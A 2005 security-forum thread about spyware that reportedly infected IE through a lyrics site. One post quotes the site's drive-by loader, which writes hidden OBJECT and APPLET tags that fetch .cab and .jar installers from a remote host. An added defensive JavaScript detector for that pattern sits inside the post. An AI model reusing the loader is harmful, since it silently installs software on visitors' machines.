Firefox Spyware Infects IE?

Discussion in 'other security issues & news' started by musicman, Mar 13, 2005.

Thread Status:
Not open for further replies.
  1. musicman

    musicman Registered Member

    Joined:
    Aug 24, 2003
    Posts:
    199
    I thought this would be of interest to our members as I read this report from another security forum.
    ========================================================

    paperghost's article can be found here, at Vital Security.org - Firefox Spyware infects IE?


    Edit Note - Please do not copy & paste an entire article - a summary or paragraph from the article is enough. Also, a link to the original source should be included. - snap
     
    Last edited by a moderator: Mar 14, 2005
  2. bigbuck

    bigbuck Registered Member

    Joined:
    Jul 7, 2004
    Posts:
    4,877
    Location:
    Qld, Aus
  3. nadirah

    nadirah Registered Member

    Joined:
    Oct 14, 2003
    Posts:
    3,647
    From spywareinfoforum.com:

    Spywareinfo Newsletter Mar13/05
     
    Last edited by a moderator: Mar 14, 2005
  4. Yeah, our very own bunch of "Experts" on this forum were muttering about scripts and whatnot in the thread "a new theory", when I tried to point out that it was just JAVA. But of course, I was ignored cos I'm a newbie.
     
  5. Bubba

    Bubba Updates Team

    Joined:
    Apr 15, 2002
    Posts:
    11,271
    Having re-read the original Wilders thread that I'm assuming you are referring to concerning this exploit....the script comments were mentioned if for no other reason than to caution IE users not to visit that site with Active script enabled because the java applet would be loaded along with a toolbar.

    Opinions may vary....but I would hardly call any posts directed toward your posts as being dismissed. I also am of the opinion one can not BS a BS concerning...."I was ignored cos I'm a newbie" ;)

    Do not visit the below links without being properly secured

    Visiting lyricspy.com with Active script enabled executes the below code:

    <script language='JavaScript' type='text/JavaScript'
    src='http://www.ysbweb.com/ist/scripts/ysb_prompt.php?
    retry=2&loadfirst=1&delayload=0&software_id=10&account_id=1001958&
    recurrence=always&adid=a1110115353&event_type=onload&user_level=3'>
    </script>

    Which then executes the below code:

    function showActiveX() {
    holder.write('<OBJECT id="barobject" width=1 height=1
    classid="CLSID:42F2C9BA-614F-47c0-B3E3-ECFD34EED658"');
    holder.write
    ('codebase="http://www.ysbweb.com/ist/softwares/v4.0/ysb_regular.cab"
    onerror="parent.retryit();">');

    holder.write('<PARAM name="account_id" value="1001958">');
    holder.write('<PARAM name="download_key"
    value="df42914d752e3362ade7e24cced39c71">');
    holder.write('<PARAM name="download_lock" value="1110807725">');
    holder.write('<PARAM name="cfg" value="ysb_l3">');
    holder.write('<PARAM name="sub" value="">');
    holder.write('</OBJECT>');
    }

    function showJava() {

    holder.write('<APPLET Archive="http://www.ysbweb.com/ist/softwares/v4.0/javainstaller.jar" code="javainstaller.InstallerApplet.class" name="InstallerApplet" width="0" height="0" hspace="0" vspace="0" align="middle">');
    holder.write('<PARAM name="account_id" value="1001958">');
    holder.write('<PARAM name="download_key" value="df42914d752e3362ade7e24cced39c71">');
    holder.write('<PARAM name="download_lock" value="1110807725">');
    holder.write('<PARAM name="cfg" value="ysb_l3">');
    holder.write('<PARAM name="sub" value="">');
    holder.write('</APPLET>');
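
A defender-side check for the loader pattern quoted in the post above, as an added example that is not part of the original thread or of any poster's code: it reassembles tags split across `.write()` calls and flags OBJECT/APPLET elements that are at most 1x1 pixel and fetch a `.cab` or `.jar` from an absolute URL. The function names, the `installer.example.test` host, the all-zero CLSID and the sample lines are assumptions constructed for illustration.

```javascript
// Added example (not from the thread): flag hidden OBJECT/APPLET installers in page script.

// Join the string literals passed to any .write(...) call, so a tag split
// across several calls (as in the quoted loader) is inspected as one tag.
function assembleWrites(script) {
  const re = /\.write\s*\(\s*(['"])((?:\\.|(?!\1)[^\\])*)\1\s*\)/g;
  let html = '', m;
  while ((m = re.exec(script)) !== null) html += m[2] + ' ';
  return html;
}

// Parse name=value pairs from one tag; values may be quoted or bare (width=1).
function parseAttrs(tag) {
  const re = /([a-z_-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
  const attrs = {};
  let m;
  while ((m = re.exec(tag)) !== null) attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4];
  return attrs;
}

// Report OBJECT/APPLET tags that are at most 1x1 pixel and pull a .cab or
// .jar from an absolute http(s) URL: the combination shown in the post.
function findSilentInstallers(script) {
  const findings = [];
  const tagRe = /<(object|applet)\b[^>]*>/gi;
  const html = assembleWrites(script);
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const a = parseAttrs(m[0]);
    const payload = a.codebase || a.archive || '';
    const remote = /^https?:\/\/\S+\.(cab|jar)$/i.test(payload);
    const hidden = Number(a.width) <= 1 && Number(a.height) <= 1;
    if (remote && hidden) {
      findings.push({ tag: m[1].toLowerCase(), payload, classid: a.classid || null });
    }
  }
  return findings;
}

// Constructed sample input: placeholder host, CLSID and class names.
const sample = [
  `holder.write('<OBJECT id="bar" width=1 height=1 classid="CLSID:00000000-0000-0000-0000-000000000000"');`,
  `holder.write('codebase="http://installer.example.test/bar.cab" onerror="parent.retryit();">');`,
  `holder.write('</OBJECT>');`,
  `holder.write('<APPLET archive="http://installer.example.test/setup.jar" code="Setup.class" width="0" height="0">');`,
  `document.write('<APPLET archive="clock.jar" code="Clock.class" width="200" height="80"></APPLET>');`,
].join('\n');

console.log(findSilentInstallers(sample));
```

The check only sees tags written as literal strings, so markup built by string concatenation or decoding at run time needs the rendered DOM inspected instead.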
     
  6. Bubba

    Bubba Updates Team

    Joined:
    Apr 15, 2002
    Posts:
    11,271
    Since we already have an ongoing thread concerning this issue from last week....I'll ask those that wish to continue the discussion to please visit the below link. This thread is now closed.

    This link---> New Theory about Infections and Spyware
     